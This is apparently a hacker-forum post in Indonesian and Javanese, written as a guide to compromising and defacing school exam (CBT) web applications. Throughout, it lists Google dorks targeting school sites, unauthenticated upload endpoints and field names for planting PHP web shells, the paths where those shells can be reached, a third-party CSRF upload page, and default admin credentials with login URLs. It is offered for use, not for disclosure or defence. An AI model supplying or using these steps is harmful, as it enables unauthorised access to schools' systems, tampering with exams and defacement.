Mboh iki onok piro.Onok sitok seng grong yaiku beesmart.Ws mbuh utek" en dewe.Langsung copas won,males nulis.
Iki seng butuh csrf :
http://albasti.com/csrf.php
Iki cbt ne.mbuh jek kenek gk.
1.CandyCBT
Untuk V2.5 Di Cbt Ini Sudah Di Patch
Dork :
"Support By Candy Cbt"candycbt + login.php
inurl:candycbt inurl:login.php site:sch.id
Untuk Exploitnya :
*/plugins/uploadfile/demo/upload.php/
*plugins/uploadfile/php/upload.php/
*plugins/uploadfile/demo/demo.html(Tidak Perlu Menggunakan Csrf Untuk Exploit Ini)
Postfile : myfile
Note : Jika Blank Vuln
Untuk Aksesnya :
plugins/uploadfile/demo/uploads/shellkalian.php
2.E-CBT
Untuk Cbt Ini Dengan Admin Week Pass Atau Default Password
Dork :
*CBT E School
*intitle:Login Peserta + cbt
Untuk User Dan Pw Nya Sebagai Berikut
User : adminutama Pass : admin12345
User : admin1 Pass : admin12345
User : admin2 Pass : admin12345
User : admin3 Pass : admin12345
Page Adminnya :
http://E-CBT.sch.id/admin/login.php
Note : Jika Ingin Upload Shell Untuk CBT ini Harus Di Tamper Gan
3.IndoCBT
Dork :
"INDOCBT" inurl:login.php
"Belajar Online" inurl:login.php
INDOCBT last update :
Untuk Exploitnya Dan Postfilenya:
*/aksi/upload-file.php(Postfile : uploadfile)
*/aksi/uploadbanner.php(Postfile: uploadfile4)
Akses Shell :
http://site.info/images/shell Kalian.php
5.Terakhir Adalah Aplikasi Ujian Online
Kalo Untuk Deface Ini Dengan Admin Week Pass Sama Seperti E-CBT
Dork :
intitle:Aplikasi Ujian Online + login.php
Untuk User Dan Passnya :
User : admin Pass : admin
Dan Untuk Admin Pagenya :
http://ujian.sch.id/admin/
#YYYYY
#angry